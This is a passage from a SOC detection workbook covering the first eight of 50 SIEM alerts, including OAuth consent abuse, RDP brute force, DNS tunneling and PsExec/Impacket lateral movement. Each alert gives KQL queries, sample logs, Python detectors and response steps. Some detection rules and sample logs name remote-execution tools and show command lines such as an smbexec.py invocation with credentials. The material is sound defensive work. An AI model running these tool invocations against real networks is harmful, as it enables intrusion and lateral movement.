2025 SIEM Alert Detection Workbook with 50 Realistic and Increasingly Common SIEM Alerts
By Izzmier Izzuddin
This workbook contains a curated list of 50 realistic and increasingly common SIEM alerts,
each structured for SOC use with detection logic, MITRE ATT&CK mapping, log examples,
threat behavior indicators and response playbooks.
1. Suspicious OAuth application consent granted in Microsoft 365
2. Successful login after multiple failed RDP attempts from foreign IP
3. Data exfiltration detected via cloud storage services (example, OneDrive, Dropbox)
4. Office macro spawning PowerShell with encoded commands
5. Lateral movement via SMB, WMI or WinRM detected
6. Impossible travel login attempts from geographically separate regions
7. DNS tunneling communication patterns observed
8. PsExec or Impacket tool execution detected internally
9. Cloud IAM role assumption from non-approved user or IP
10. Creation of scheduled task by non-administrative account
11. Registry autorun key modification from unknown parent process
12. PowerShell download and execution from external URL
13. Suspicious beaconing to known malicious C2 domain
14. Excessive failed login attempts followed by a successful login
15. Local account creation on endpoint outside of provisioning process
16. Unusual volume of file encryption activity (potential ransomware)
17. Endpoint DLP alert on sensitive file movement to USB
18. VPN login from blacklisted IP addresses
19. Disabled antivirus or EDR agent service on endpoint
20. Mass file deletion detected on shared folder
21. New domain admin group member added
22. Login from newly registered domain email address
23. Brute-force attack detected on web-facing application login
24. Unusual login time detected based on user behaviour baseline
25. Uncommon protocol usage detected over standard ports (example, SSH over HTTP)
26. Remote PowerShell execution from unauthorised host
27. Mimikatz tool execution or similar credential dumping tool detected
28. New inbox rule created to auto-forward emails externally
29. Suspicious VPN login not followed by normal application access
30. Failed multi-factor authentication attempts exceeding threshold
31. Lateral movement using RDP from a non-jump host
32. Rare or first-time login from specific device or location
33. Changes to critical GPO objects in Active Directory
34. Discovery commands executed in quick succession on endpoint
35. Unusual spike in outbound network traffic volume
36. Unauthorised access attempt to restricted file shares
37. Endpoint connection to known malware distribution domain
38. Unusual PowerShell command involving Base64 decoding
39. Login with disabled or expired user account
40. Cloud workload performing port scanning on internal assets
41. Cloud bucket misconfiguration alert (example, open to public)
42. Fileless malware behaviour detected via memory-only execution
43. Excessive use of “net use” or “net group” command on hosts
44. Kerberoasting activity detected in AD logs
45. Access to critical application with bypassed SSO
46. Activity resembling Golden Ticket or Silver Ticket attacks
47. Device sending SMTP traffic directly to internet without relay
48. Unusual API key usage patterns in cloud service
49. Unauthorised modification of IAM policy in AWS or Azure
50. Legacy protocol (example, NTLMv1) authentication used internally
1. Alert Name: Suspicious OAuth Application Consent Granted (Microsoft 365)
Alert Logic
Objective: Detect when a user consents to a malicious or suspicious third-party
application that has high privileges (example, mail read/write, file access, etc.)
Data Source: Microsoft 365 Unified Audit Log, Azure AD sign-in logs and Azure AD audit
logs.
Detection Logic (KQL - Microsoft Sentinel example):
AuditLogs
| where OperationName == "Consent to application"
| mv-expand Target = TargetResources
| extend AppId = tostring(Target.id), AppName = tostring(Target.displayName)
| extend UserPrincipalName = tostring(InitiatedBy.user.userPrincipalName)
// modifiedProperties is an array of {displayName, newValue}; flatten it into one bag per consent
| mv-expand Prop = Target.modifiedProperties
| summarize Props = make_bag(bag_pack(tostring(Prop.displayName), tostring(Prop.newValue)))
    by TimeGenerated, CorrelationId, UserPrincipalName, AppId, AppName
| extend ConsentType = tostring(Props["Consent Type"]), Permissions = tostring(Props["Resource ID"])
| where ConsentType =~ "User" or ConsentType =~ "AllPrincipals"
| where Permissions has_any ("Mail.Read", "Mail.ReadWrite", "Files.Read.All",
    "Sites.Read.All", "offline_access")
| project TimeGenerated, UserPrincipalName, AppId, AppName, Permissions, ConsentType
Logic Summary:
• Triggers when a user or tenant admin grants a third-party app access to the tenant
• Filters on dangerous delegated permissions (mailbox, files, sites); offline_access means the app holds a refresh token and keeps access after a password reset
• Detects both individual (ConsentType "User") and tenant-wide admin (ConsentType "AllPrincipals") consents
• Caveat: live Azure AD audit records expose these values under the modifiedProperties names ConsentContext.IsAdminConsent and ConsentAction.Permissions; keep the two keys in the query aligned with your tenant's export
MITRE ATT&CK Mapping
Tactic: Credential Access, Defense Evasion, Discovery
Techniques:
- T1528: Steal Application Access Token
- T1550.001: Use Alternate Authentication Material – Application Access Token
- T1087.004: Account Discovery – Cloud Account
Explanation:
An attacker who tricks a user into consenting holds an OAuth access and refresh token for the app and can read mail and files without the user's password, without triggering MFA and without any interactive sign-in. That access survives password resets until the consent itself is revoked, which is why consent abuse doubles as a persistence mechanism.
Log Example (Microsoft 365 Audit JSON format)
{
"CreationTime": "2025-04-23T08:17:24Z",
"Id": "abc12345-1111-2222-3333-xyz98765",
"Operation": "Consent to application",
"OrganizationId": "org-123456",
"UserId": "izzmier@company.com",
"UserType": 0,
"RecordType": 8,
"Workload": "AzureActiveDirectory",
"ClientIP": "203.123.45.67",
"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"TargetResources": [
{
"id": "a1b2c3d4-5678-90ef-ghij-112233445566",
"displayName": "MailAccessPro",
"modifiedProperties": [
{
"displayName": "Consent Type",
"newValue": "User"
},
{
"displayName": "Resource ID",
"newValue": "[\"Mail.ReadWrite\",\"offline_access\"]"
}
]
}
],
"InitiatedBy": {
"user": {
"id": "user-guid-0001",
"userPrincipalName": "izzmier@company.com",
"displayName": "Izzmier"
}
}
}
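The consent record above, run through the same logic as the KQL, as an added example that is not part of the workbook. The sample records, the HIGH_RISK_PERMISSIONS list and the function names are constructed for illustration; the modifiedProperties keys follow the log example on this page ("Consent Type", "Resource ID"), so adjust them if your tenant export uses the ConsentContext/ConsentAction names.

```python
import json

# Delegated Graph scopes that give a third-party app broad mailbox or file access
# (assumption: a starting list, extend it for your tenant).
HIGH_RISK_PERMISSIONS = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
    "Files.Read.All", "Files.ReadWrite.All", "Sites.Read.All", "offline_access",
}


def modified_props(resource):
    """Flatten a TargetResources[].modifiedProperties list into {displayName: newValue}."""
    return {p.get("displayName"): p.get("newValue")
            for p in resource.get("modifiedProperties", [])}


def parse_permissions(raw):
    """The permission list arrives as a JSON-encoded string inside newValue;
    some exports use a space-separated scope string instead, so accept both."""
    if not raw:
        return set()
    try:
        parsed = json.loads(raw)
        return set(parsed) if isinstance(parsed, list) else {str(parsed)}
    except json.JSONDecodeError:
        return set(raw.split())


def evaluate_consent(event):
    """Return one finding per target app that was granted a high-risk permission.

    Mirrors the KQL above: filter on the consent operation, extract consent type
    and permissions from modifiedProperties, keep User and AllPrincipals consents,
    and intersect the granted scopes with HIGH_RISK_PERMISSIONS.
    """
    findings = []
    if event.get("Operation") != "Consent to application":
        return findings
    for res in event.get("TargetResources", []):
        props = modified_props(res)
        consent_type = props.get("Consent Type", "")
        if consent_type not in ("User", "AllPrincipals"):
            continue
        risky = sorted(parse_permissions(props.get("Resource ID")) & HIGH_RISK_PERMISSIONS)
        if risky:
            findings.append({
                "user": event.get("UserId"),
                "client_ip": event.get("ClientIP"),
                "app_id": res.get("id"),
                "app_name": res.get("displayName"),
                "consent_type": consent_type,
                "tenant_wide": consent_type == "AllPrincipals",  # admin consent exposes every user
                "risky_permissions": risky,
            })
    return findings


# Constructed sample record (not from a real tenant) with the same shape as the log above.
SAMPLE_CONSENT = {
    "Operation": "Consent to application",
    "UserId": "izzmier@company.com",
    "ClientIP": "203.123.45.67",
    "TargetResources": [{
        "id": "a1b2c3d4-5678-90ef-ghij-112233445566",
        "displayName": "MailAccessPro",
        "modifiedProperties": [
            {"displayName": "Consent Type", "newValue": "User"},
            {"displayName": "Resource ID", "newValue": '["Mail.ReadWrite","offline_access"]'},
        ],
    }],
}

# Constructed benign consent: a low-privilege scope that should not fire.
BENIGN_CONSENT = {
    "Operation": "Consent to application",
    "UserId": "izzmier@company.com",
    "TargetResources": [{
        "id": "00000000-0000-0000-0000-000000000001",
        "displayName": "TeamsStatusWidget",
        "modifiedProperties": [
            {"displayName": "Consent Type", "newValue": "User"},
            {"displayName": "Resource ID", "newValue": '["User.Read"]'},
        ],
    }],
}

if __name__ == "__main__":
    for finding in evaluate_consent(SAMPLE_CONSENT):
        print(finding)
```

The tenant_wide flag is the triage priority: a User consent exposes one mailbox, an AllPrincipals consent exposes every mailbox in the tenant and needs the app blocked rather than the single grant revoked.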
Recommended Response Actions
1. Revoke OAuth Consent from the user account via Azure AD portal.
2. Investigate Application ID to check if it's reported on threat intel databases
(example, VirusTotal, M365 Defender TI).
3. Run Sign-in Analysis for the user in question and check any abnormal activities.
4. Reset User Session Tokens and review conditional access policies.
5. Hunt for similar consents across other users using the same logic.
2. Alert Name: Successful RDP Login After Multiple Failed Attempts from Foreign IP
Alert Logic
Objective: Detect brute-force RDP attacks followed by successful authentication, often a
sign of credential compromise.
Data Sources:
• Windows Security Event Logs (Event IDs: 4625 for failed logon, 4624 for successful
logon)
• Firewall logs (to confirm public IP source)
• Threat Intelligence feeds (to flag foreign or risky IPs)
Detection Logic (KQL – Microsoft Sentinel example):
let time_window = 30m;
let brute_force_threshold = 10;
let FailedLogons = SecurityEvent
| where EventID == 4625 and LogonType in (10, 3)   // NLA-protected RDP logs its failures as type 3
| summarize FailedCount = count(), FirstFail = min(TimeGenerated), LastFail = max(TimeGenerated)
    by TargetUserName, IpAddress
| where FailedCount >= brute_force_threshold;
let SuccessfulLogons = SecurityEvent
| where EventID == 4624 and LogonType == 10
| project SuccessTime = TimeGenerated, TargetUserName, IpAddress;
FailedLogons
| join kind=inner (SuccessfulLogons) on TargetUserName, IpAddress
| where SuccessTime between (FirstFail .. (LastFail + time_window))
| project-away TargetUserName1, IpAddress1
| extend Alert = "Brute force suspected: Multiple RDP failures followed by successful login"
Logic Summary:
• RDP = LogonType 10; with Network Level Authentication enabled, failed RDP attempts are recorded as LogonType 3 (the CredSSP pre-authentication), so the failure side accepts both
• Threshold of failed attempts (example, ≥10)
• Successful login within a short time (example, 30 minutes) from same IP
• Optional: Filter IPs outside organisation's geolocation or allowlist
MITRE ATT&CK Mapping
Tactic: Initial Access, Credential Access
Techniques:
- T1110.001: Brute Force – Password Guessing
- T1133: External Remote Services (internet-exposed RDP)
- T1078.001: Valid Accounts – Local Accounts
Explanation:
The alert maps to adversaries brute-forcing credentials and then authenticating over RDP, particularly against internet-exposed machines.
Log Events (Windows Event Log Format)
Event ID 4625 – Failed RDP Attempt
{
"EventID": 4625,
"TimeGenerated": "2025-04-23T08:01:00Z",
"TargetUserName": "adminuser",
"LogonType": 10,
"IpAddress": "193.203.45.12",
"Status": "0xC000006D",
"FailureReason": "Unknown user name or bad password",
"WorkstationName": "WIN-RDP01"
}
Event ID 4625 – Repeated
(Multiple similar entries in short interval from same IP)
Event ID 4624 – Successful RDP Login
{
"EventID": 4624,
"TimeGenerated": "2025-04-23T08:05:30Z",
"TargetUserName": "adminuser",
"LogonType": 10,
"IpAddress": "193.203.45.12",
"Status": "0x0",
"WorkstationName": "WIN-RDP01",
"AuthenticationPackage": "Negotiate"
}
Threat Intelligence Match (Optional Add-on)
{
"IpAddress": "193.203.45.12",
"ThreatScore": 85,
"ThreatCategory": "Brute Force, RDP Abuse",
"Country": "Russia",
"Confidence": "High"
}
Recommended Response Actions
1. Isolate the machine immediately from the network if compromise suspected.
2. Force password reset for the account involved and check for lateral movement.
3. Check for tools or scripts dropped post-login (example, Mimikatz, malware).
4. Add IP to blocklist and update firewall rules if applicable.
5. Enable RDP geo-restriction or VPN access only with MFA.
6. Review audit logs to ensure no persistence was established.
3. Data Exfiltration via Cloud Storage Services (example, OneDrive, Dropbox)
Alert Logic
Objective: Detect large or unusual data uploads to cloud storage providers which may
indicate exfiltration.
Data Sources:
• Endpoint DLP
• CASB (Cloud Access Security Broker)
• Proxy/firewall logs
Detection Logic Example (KQL or CASB Policy):
DeviceNetworkEvents
| where RemoteUrl has_any ("dropbox.com", "drive.google.com", "onedrive.live.com")
| summarize UploadVolume = sum(SentBytes) by DeviceName, RemoteUrl,
    InitiatingProcessAccountName, bin(TimeGenerated, 1h)
| where UploadVolume > 100000000 // example, >100MB
Logic Summary:
• Detects data uploads to known cloud services
• Threshold-based (example, >100MB in 1 hour)
• Can enrich with file sensitivity metadata from DLP
• Caveat: Defender for Endpoint's DeviceNetworkEvents records connections, not byte counts; SentBytes has to come from proxy, firewall (CommonSecurityLog) or CASB telemetry joined on device and time window
• Exclude the organisation's own tenant (example, company-my.sharepoint.com) or the rule fires on routine OneDrive sync
MITRE ATT&CK Mapping
Tactic: Exfiltration
Technique: T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage
Log
{
"TimeGenerated": "2025-04-23T10:32:12Z",
"DeviceName": "HR-PC01",
"InitiatingProcessAccountName": "nur.izzah@company.com",
"RemoteUrl": "https://www.dropbox.com/upload",
"SentBytes": 154387422,
"ProcessName": "chrome.exe"
}
Response Actions
• Confirm file type and sensitivity
• Interview user to validate purpose
• Block cloud storage access from unmanaged endpoints
• Review access policies in CASB
4. Office Macro Spawning PowerShell with Encoded Commands
Alert Logic
Objective: Detect initial access via Office macros that invoke PowerShell scripts.
Data Sources:
• EDR
• Sysmon (Event ID 1 – process creation)
Detection Logic (EDR/Sysmon Example):
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "-EncodedCommand", "FromBase64String")
MITRE ATT&CK Mapping
Tactic: Initial Access, Execution
Techniques: T1566.001 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1059.001 (Command and Scripting Interpreter: PowerShell)
Log
{
"TimeGenerated": "2025-04-23T09:15:00Z",
"DeviceName": "FIN-PC23",
"InitiatingProcess": "C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe",
"ProcessCommandLine": "powershell.exe -enc JAB...dA==",
"ProcessId": 4320,
"UserName": "amirul.azim@company.com"
}
Response Actions
• Quarantine device
• Obtain the full script from memory (if possible)
• Submit the decoded command to sandbox analysis
• Block future macro execution by GPO or Defender ASR rules
5. Lateral Movement via SMB, WMI or WinRM Detected
Alert Logic
Objective: Detect unauthorised use of lateral movement protocols between internal
systems.
Data Sources:
• EDR
• Sysmon (Event ID 3 – network connection)
• Zeek logs (if deployed)
Detection Logic (Sysmon + EDR):
DeviceNetworkEvents
| where RemotePort in (445, 135, 5985, 5986)   // SMB, RPC endpoint mapper (WMI/DCOM), WinRM HTTP/HTTPS
| where InitiatingProcessFileName in~ ("wmic.exe", "powershell.exe", "pwsh.exe", "psexec.exe")
| where InitiatingProcessAccountDomain !startswith "IT"
    and InitiatingProcessAccountName !in ("admin1", "svc-backup")
MITRE ATT&CK Mapping
Tactic: Lateral Movement
Techniques: T1021.002 – SMB/Windows Admin Shares, T1047 – Windows Management Instrumentation, T1021.006 – Windows Remote Management
Log
{
"TimeGenerated": "2025-04-23T11:03:45Z",
"DeviceName": "CORP-LAPTOP32",
"InitiatingProcess":
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"RemoteAddress": "192.168.1.47",
"RemotePort": 5985,
"UserName": "adam.zulkifli@company.com"
}
Response Actions
• Correlate with recent login history of the user
• Capture memory for forensic review
• Disable compromised account if confirmed
• Enable PowerShell Constrained Language Mode and block WMI where unnecessary
6. Alert Name: Impossible Travel Login Attempts
Alert Logic
Objective: Detect account compromise based on geographically impossible login activity
within an unrealistically short time frame.
Data Sources:
• Identity Provider logs (example, Azure AD, Okta, Google Workspace)
• Geo-IP database (enrichment layer)
• UEBA (User and Entity Behaviour Analytics) systems
Detection Logic (KQL – Microsoft Sentinel / Azure AD Example):
let logins = SigninLogs
| where ResultType == 0
| project UserPrincipalName, IPAddress, TimeGenerated,
    Country = tostring(LocationDetails.countryOrRegion);
logins
| join kind=inner (
    logins
    | project UserPrincipalName, PreviousTime = TimeGenerated, PreviousIP = IPAddress,
        PreviousCountry = Country
) on UserPrincipalName
| where PreviousTime < TimeGenerated
    and datetime_diff('minute', TimeGenerated, PreviousTime) < 60
| where Country != PreviousCountry
| extend Alert = "Impossible Travel Detected: Different countries within 60 minutes"
Logic Summary:
• Finds two successful logins by the same user from different countries within a short window (example, <60 minutes); requiring PreviousTime < TimeGenerated stops each pair from being reported twice
• Highlights unrealistic travel scenario (example, Malaysia to Germany in 20 minutes)
• Can be enhanced with known user travel policy and conditional access tags; exclude VPN egress and mobile carrier ranges, which are the main source of false positives
MITRE ATT&CK Mapping
Tactic: Initial Access, Credential Access
Techniques: T1078.004 – Valid Accounts: Cloud Accounts, T1566 – Phishing, T1110.004 – Brute Force: Credential Stuffing
Explanation:
Often associated with account compromise due to phishing or password reuse across
exposed services.
Log Events (Azure Sign-In Logs)
Login 1 – Kuala Lumpur, Malaysia
{
"TimeGenerated": "2025-04-23T08:05:00Z",
"UserPrincipalName": "maria.lim@company.com",
"IPAddress": "175.139.21.45",
"Location": {
"city": "Kuala Lumpur",
"countryOrRegion": "MY"
},
"ResultType": 0,
"ClientAppUsed": "Browser",
"AuthenticationRequirement": "MFA"
}
Login 2 – Berlin, Germany (30 minutes later)
{
"TimeGenerated": "2025-04-23T08:35:00Z",
"UserPrincipalName": "maria.lim@company.com",
"IPAddress": "92.212.121.99",
"Location": {
"city": "Berlin",
"countryOrRegion": "DE"
},
"ResultType": 0,
"ClientAppUsed": "Browser",
"AuthenticationRequirement": "MFA Bypass"
}
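The two sign-ins above scored by implied travel speed rather than by country change, as an added example that is not part of the workbook. It goes beyond the KQL in one way: it uses Geo-IP coordinates and the haversine distance, so a Kuala Lumpur to Singapore pair two hours apart passes while Kuala Lumpur to Berlin in 30 minutes fires. The coordinates, the 900 km/h and 200 km thresholds, the function names and the extra sign-ins are constructed; the two documentation-range IPs (203.0.113.7, 198.51.100.9) are placeholders.

```python
import math
from collections import defaultdict
from datetime import datetime

EARTH_RADIUS_KM = 6371.0
TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two WGS84 points in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def impossible_travel(logins, max_speed_kmh=900.0, min_distance_km=200.0):
    """Flag consecutive successful logins whose implied speed exceeds max_speed_kmh.

    Each login needs UserPrincipalName, TimeGenerated, IPAddress, lat, lon (from
    Geo-IP enrichment) and countryOrRegion. min_distance_km suppresses noise from
    Geo-IP jitter between nearby cities and carrier NAT. Thresholds are assumptions.
    """
    by_user = defaultdict(list)
    for row in logins:
        if row.get("ResultType", 0) == 0:        # successful sign-ins only
            by_user[row["UserPrincipalName"]].append(row)

    alerts = []
    for upn, rows in by_user.items():
        rows.sort(key=lambda r: r["TimeGenerated"])
        for prev, cur in zip(rows, rows[1:]):
            distance = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if distance < min_distance_km:
                continue
            t0 = datetime.strptime(prev["TimeGenerated"], TIME_FMT)
            t1 = datetime.strptime(cur["TimeGenerated"], TIME_FMT)
            hours = (t1 - t0).total_seconds() / 3600.0
            speed = distance / hours if hours > 0 else float("inf")
            if speed > max_speed_kmh:
                alerts.append({
                    "user": upn,
                    "from": (prev["countryOrRegion"], prev["IPAddress"]),
                    "to": (cur["countryOrRegion"], cur["IPAddress"]),
                    "distance_km": round(distance),
                    "minutes": round(hours * 60),
                    "implied_speed_kmh": round(speed),
                })
    return alerts


# Constructed sign-ins with Geo-IP coordinates added (not real telemetry).
SAMPLE_LOGINS = [
    {"UserPrincipalName": "maria.lim@company.com", "TimeGenerated": "2025-04-23T08:05:00Z",
     "IPAddress": "175.139.21.45", "lat": 3.139, "lon": 101.687, "countryOrRegion": "MY", "ResultType": 0},
    {"UserPrincipalName": "maria.lim@company.com", "TimeGenerated": "2025-04-23T08:35:00Z",
     "IPAddress": "92.212.121.99", "lat": 52.520, "lon": 13.405, "countryOrRegion": "DE", "ResultType": 0},
    # A plausible commute: Kuala Lumpur to Singapore two hours apart, no alert expected.
    {"UserPrincipalName": "adam.zulkifli@company.com", "TimeGenerated": "2025-04-23T06:00:00Z",
     "IPAddress": "175.139.21.46", "lat": 3.139, "lon": 101.687, "countryOrRegion": "MY", "ResultType": 0},
    {"UserPrincipalName": "adam.zulkifli@company.com", "TimeGenerated": "2025-04-23T08:00:00Z",
     "IPAddress": "203.0.113.7", "lat": 1.352, "lon": 103.820, "countryOrRegion": "SG", "ResultType": 0},
    # A failed sign-in is ignored even though it comes from far away.
    {"UserPrincipalName": "adam.zulkifli@company.com", "TimeGenerated": "2025-04-23T08:10:00Z",
     "IPAddress": "198.51.100.9", "lat": 40.713, "lon": -74.006, "countryOrRegion": "US", "ResultType": 50126},
]

if __name__ == "__main__":
    for alert in impossible_travel(SAMPLE_LOGINS):
        print(alert)
```

Speed-based scoring also catches a London to Paris pair (same 60-minute window, different countries, but a feasible train ride) without a special case, which the pure country comparison cannot do.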
Response Actions
1. Lock user account and force password reset
2. Check for conditional access policy gaps, such as missing MFA or MFA bypass for
trusted IPs
3. Review email rules and OAuth grants for malicious persistence
4. Analyze session token usage to understand if token replay or session hijack
occurred
5. Initiate full account activity review with focus on privilege escalation or data access
7. Alert Name: DNS Tunneling Communication Patterns Observed
Alert Logic
Objective: Detect covert data exfiltration or Command-and-Control (C2) using DNS
protocol often by abusing TXT or NULL record queries with encoded payloads.
Data Sources:
• DNS logs (example, Windows DNS Server, Zeek, Palo Alto, Infoblox, Cisco
Umbrella)
• Network traffic analysis
• Threat intelligence feeds
Detection Logic (Zeek DNS Log Example in KQL):
DNSLogs
| where QueryType in ("TXT", "NULL")
| extend SubdomainLength = strlen(tostring(split(QueryName, ".")[0]))
| where SubdomainLength > 50
| summarize Count = count(), UniqueQueryNames = dcount(QueryName) by SrcIP,
    bin(TimeGenerated, 15m)
| where Count > 100 or UniqueQueryNames > 80
Logic Summary:
• Looks for high-volume DNS requests with very long subdomains
• Flags uncommon record types (TXT, NULL) used in tunneling
• Ideal with DNS entropy scoring or threat intel enrichment
• Caveat: tools such as iodine and dnscat2 also tunnel over A, CNAME and MX queries, so run a second variant without the record-type filter and group by registered domain rather than full query name
MITRE ATT&CK Mapping
Tactic: Command and Control, Exfiltration
Techniques: T1071.004 – Application Layer Protocol: DNS, T1048.003 – Exfiltration Over Unencrypted Non-C2 Protocol
Explanation:
DNS tunneling enables attackers to communicate through firewalls using DNS queries as a
transport for payloads or commands.
DNS Log Entry (Zeek or Infoblox Style)
{
"TimeGenerated": "2025-04-23T09:42:00Z",
"SrcIP": "10.20.30.40",
"QueryName": "9ab7dffed0310c7fefbcd10c3f9c9be01e3fa1.example.com",
"QueryType": "TXT",
"ResponseCode": "NOERROR",
"Answer": "dXNlcm5hbWU9am9obg==",
"Resolver": "8.8.8.8",
"ClientName": "client-PC01.company.local"
}
Threat Behavior Indicators
• Excessive queries from one internal host to non-cached subdomains
• Use of uncommon query types (example, TXT, NULL)
• Consistent beaconing to a suspicious domain
• Subdomain patterns with base64 or hex encoding
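The indicators above turned into a scorer that runs over DNS log records of the shape shown, as an added example that is not part of the workbook. It extends the KQL with the entropy scoring the Logic Summary recommends and groups by registered domain instead of full query name, so a tunnel that rotates labels still aggregates. The record set, the 3.5-bit entropy threshold, the record-type list and the function names are constructed; the 100/80 per 15 minutes thresholds are the workbook's own.

```python
import hashlib
import math
from collections import defaultdict
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"
# Record types commonly abused by tunnelers (assumption: extend for your environment).
TUNNEL_RECORD_TYPES = {"TXT", "NULL", "CNAME", "MX"}


def shannon_entropy(s):
    """Bits of entropy per character; encoded payloads score higher than words."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain labels, registered domain). Crude two-label suffix; a
    public-suffix list is needed for co.uk-style domains in production."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])


def query_features(record):
    subs, domain = split_name(record["QueryName"])
    first_label = subs[0] if subs else ""
    return {
        "domain": domain,
        "label_len": len(first_label),
        "entropy": shannon_entropy(first_label),
        "odd_type": record.get("QueryType", "A").upper() in TUNNEL_RECORD_TYPES,
    }


def detect_dns_tunneling(records, window_minutes=15, min_label_len=50,
                         entropy_threshold=3.5, query_threshold=100, unique_threshold=80):
    """Aggregate encoded-looking queries per (source, registered domain, time window).

    A query counts when its first label is long or high-entropy, or uses an odd
    record type. Volume thresholds mirror the workbook's 100 queries / 80 unique names.
    """
    buckets = defaultdict(lambda: {"count": 0, "names": set(), "entropy_sum": 0.0, "odd_type": 0})
    for rec in records:
        f = query_features(rec)
        encoded_looking = f["label_len"] >= min_label_len or f["entropy"] >= entropy_threshold
        if not (encoded_looking or f["odd_type"]):
            continue
        ts = datetime.strptime(rec["TimeGenerated"], TIME_FMT)
        window = ts.replace(minute=ts.minute - ts.minute % window_minutes, second=0)
        b = buckets[(rec["SrcIP"], f["domain"], window)]
        b["count"] += 1
        b["names"].add(rec["QueryName"])
        b["entropy_sum"] += f["entropy"]
        b["odd_type"] += int(f["odd_type"])

    alerts = []
    for (src, domain, window), b in buckets.items():
        if b["count"] > query_threshold or len(b["names"]) > unique_threshold:
            alerts.append({
                "src_ip": src, "domain": domain, "window_start": window.strftime(TIME_FMT),
                "queries": b["count"], "unique_names": len(b["names"]),
                "avg_entropy": round(b["entropy_sum"] / b["count"], 2),
                "odd_type_queries": b["odd_type"],
            })
    return alerts


def _constructed_dns_log():
    """Constructed records: 120 hex-labelled TXT lookups from one host plus normal A lookups."""
    recs = []
    start = datetime(2025, 4, 23, 9, 30, 5)
    for i in range(120):
        label = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()   # 64 hex chars, looks encoded
        recs.append({"TimeGenerated": (start + timedelta(seconds=4 * i)).strftime(TIME_FMT),
                     "SrcIP": "10.20.30.40", "QueryName": f"{label}.example.com", "QueryType": "TXT"})
    for i in range(30):
        recs.append({"TimeGenerated": (start + timedelta(seconds=10 * i)).strftime(TIME_FMT),
                     "SrcIP": "10.20.30.41", "QueryName": "www.microsoft.com", "QueryType": "A"})
    return recs


SAMPLE_DNS_LOG = _constructed_dns_log()

if __name__ == "__main__":
    for alert in detect_dns_tunneling(SAMPLE_DNS_LOG):
        print(alert)
```

Hex-encoded labels sit just under 4 bits per character and Base32/Base64 labels higher, while dictionary words and CDN hostnames stay around 2.5 to 3 bits; the avg_entropy field is what separates a tunnel from a legitimate high-volume client such as an anti-spam lookup service.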
Response Actions
1. Block the destination domain/IP at the DNS resolver or firewall level
2. Quarantine the endpoint and review for malware artifacts
3. Decode and analyse subdomain content for indicators of exfiltrated data
4. Hunt for similar patterns across other internal endpoints
5. Apply DNS tunneling detection signatures in IDS/IPS and SIEM
6. Implement DNS query size and volume thresholds for detection and alerting
8. Alert Name: PsExec or Impacket Tool Execution Detected Internally
Alert Logic
Objective: Detect lateral movement attempts using common post-exploitation tools such
as PsExec, Impacket’s wmiexec.py, smbexec.py or psexec.py.
Data Sources:
• EDR (CrowdStrike, Microsoft Defender for Endpoint, SentinelOne, etc.)
• Sysmon (Event ID 1 for process creation)
• Windows Security Event Logs (Event IDs 4688, 7045)
Detection Logic (KQL - Microsoft Sentinel or Defender EDR):
DeviceProcessEvents
| where FileName in~ ("psexec.exe", "psexec64.exe", "paexec.exe")
    or ProcessCommandLine has_any ("smbexec", "wmiexec", "psexec.py", "atexec", "dcomexec",
        "RemCom", "PAExec", "Impacket")
| where InitiatingProcessAccountName !contains "admin"
    and InitiatingProcessAccountName !contains "svc"
| extend Alert = "Lateral movement tool detected: PsExec/Impacket"
Alternate Logic (Sysmon - Process Creation):
Sysmon
| where EventID == 1
| where ParentImage has_any ("python.exe", "cmd.exe")
| where CommandLine has_any ("smbexec", "wmiexec", "psexec")
MITRE ATT&CK Mapping
Tactic: Lateral Movement, Execution
Techniques: T1021.002 – SMB/Windows Admin Shares, T1047 – Windows Management Instrumentation, T1569.002 – System Services: Service Execution, T1021.003 – Distributed Component Object Model (DCOM)
Explanation:
These tools are used by red teams, ransomware groups and APT actors to move laterally
using valid credentials and common protocols (SMB, RPC, WMI).
EDR Log (Process Execution)
{
"TimeGenerated": "2025-04-23T10:55:01Z",
"DeviceName": "FINANCE-WS33",
"InitiatingProcessAccountName": "norazila.kassim@company.com",
"FileName": "python.exe",
"ProcessCommandLine": "python smbexec.py
COMPANY/domainuser:Password123@192.168.10.21",
"ParentProcessName": "cmd.exe",
"MD5": "e99a18c428cb38d5f260853678922e03",
"SHA256": "c3b414e5e8b8a7c8cf6d07f9a6e4a00c..."
}
Other Identifiers
• PsExec creates a service called PSEXESVC on the remote system (Event ID 7045 on the target); Impacket's psexec.py installs a service and binary with random names instead
• Impacket's wmiexec.py runs each command on the target as cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1, collecting the output through the ADMIN$ share
• Process lineage from python.exe or cmd.exe with suspicious parameters
• Caveat: Impacket normally runs on the attacker's own machine, so the process-creation queries above only fire when it is launched from a compromised Windows host; the target-side artefacts (7045 service installs, the cmd.exe /Q /c pattern spawned by WmiPrvSE.exe) are the more reliable signal
Response Actions
1. Immediately isolate the affected host
2. Review lateral access targets and check for any persistence setup
3. Search for usage of PsExec service creation on other systems
4. Reset passwords for any involved accounts (especially shared/domain accounts)
5. Apply blocking and alerting for known Impacket hash signatures and behaviour
6. Enable Windows Firewall rules to block SMB from workstation to workstation
9. Alert Name: Cloud IAM Role Assumption from Non-Approved User or IP
Alert Logic
